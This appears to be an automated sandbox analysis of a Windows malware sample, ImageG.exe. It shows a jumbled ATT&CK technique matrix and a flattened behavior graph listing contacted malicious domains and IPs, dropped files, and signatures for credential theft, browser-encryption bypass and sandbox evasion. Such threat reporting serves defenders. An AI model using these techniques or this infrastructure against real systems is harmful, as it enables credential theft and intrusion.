        Email AddressesDNS ServerDomain Accounts2
        PowerShell        		12
        Registry Run Keys / Startup Folder        		11
        Process Injection        		1
        Extra Window Memory Injection        		Security Account Manager44
        System Information Discovery        		SMB/Windows Admin Shares1
        Email Collection        		1
        Remote Access Software        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
        Registry Run Keys / Startup Folder        		13
        Masquerading        		NTDS421
        Security Software Discovery        		Distributed Component Object Model1
        Clipboard Data        		4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Modify Registry        		LSA Secrets2
        Process Discovery        		SSHKeylogging5
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts131
        Virtualization/Sandbox Evasion        		Cached Domain Credentials131
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Process Injection        		DCSync1
        Application Window Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
        Remote System Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1639532 Sample: ImageG.exe Startdate: 15/03/2025 Architecture: WINDOWS Score: 100 74 nova-blight.xyz 2->74 76 store-na-phx-1.gofile.io 2->76 78 20 other IPs or domains 2->78 108 Suricata IDS alerts for network traffic 2->108 110 Sigma detected: Capture Wi-Fi password 2->110 112 Yara detected NovaSentinel 2->112 116 6 other signatures 2->116 10 ImageG.exe 179 2->10         started        signatures3 114 Performs DNS queries to domains with low reputation 74->114 process4 file5 58 C:\Users\user\AppData\Local\...\ImageG.exe, PE32+ 10->58 dropped 60 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 10->60 dropped 62 C:\Users\user\AppData\Local\...\System.dll, PE32 10->62 dropped 64 10 other files (none is malicious) 10->64 dropped 130 Drops large PE files 10->130 14 ImageG.exe 84 10->14         started        signatures6 process7 dnsIp8 94 nova-blight.xyz 45.145.164.199, 443, 58374, 58384 INETTECH1-ASRU France 14->94 96 store-na-phx-1.gofile.io 94.139.32.29, 443, 58431, 61018 ENIX-ASFR Belgium 14->96 98 17 other IPs or domains 14->98 66 C:\Users\user\AppData\Roaming\...\ImageG.exe, PE32 14->66 dropped 68 C:\Users\user\...\places.sqlite_tmp-shm, data 14->68 dropped 70 C:\Users\user\AppData\...\places.sqlite_tmp, SQLite 14->70 dropped 72 13 other files (3 malicious) 14->72 dropped 100 Attempt to bypass Chrome Application-Bound Encryption 14->100 102 Uses cmd line tools excessively to alter registry or file data 14->102 104 Overwrites Mozilla Firefox settings 14->104 106 5 other signatures 14->106 19 cmd.exe 14->19         started        22 cmd.exe 14->22         started        24 cmd.exe 14->24         started        26 70 other processes 14->26 file9 signatures10 process11 dnsIp12 118 Suspicious powershell command line found 19->118 120 Uses cmd line tools excessively to alter registry or file data 19->120 122 Tries to download and execute files (via powershell) 19->122 128 2 other signatures 19->128 29 conhost.exe 19->29         started        32 chcp.com 19->32         started        34 powershell.exe 22->34         started        38 conhost.exe 22->38         started        40 reg.exe 24->40         started        42 conhost.exe 24->42         started        88 192.168.11.20, 137, 1900, 443 unknown unknown 26->88 90 162.159.61.3, 443, 49779, 61236 CLOUDFLARENETUS United States 26->90 92 2 other IPs or domains 26->92 124 Tries to harvest and steal WLAN passwords 26->124 126 Loading BitLocker PowerShell Module 26->126 44 powershell.exe 26->44         started        46 chrome.exe 26->46         started        48 99 other processes 26->48 signatures13 process14 dnsIp15 80 i.imgflip.com 104.16.40.101, 443, 49771 CLOUDFLARENETUS United States 34->80 56 C:\Users\user\AppData\Local\Temp\error.jpg, JPEG 34->56 dropped 132 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 34->132 134 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 34->134 136 Queries memory information (via WMI often done to detect virtual machines) 34->136 138 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 40->138 140 Loading BitLocker PowerShell Module 44->140 82 plus.l.google.com 172.217.215.102, 443, 49795 GOOGLEUS United States 46->82 84 172.217.215.99, 443, 49784, 49785 GOOGLEUS United States 46->84 86 2 other IPs or domains 46->86 50 net1.exe 48->50         started        52 Conhost.exe 48->52         started        54 Conhost.exe 48->54         started        file16 signatures17 process18

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.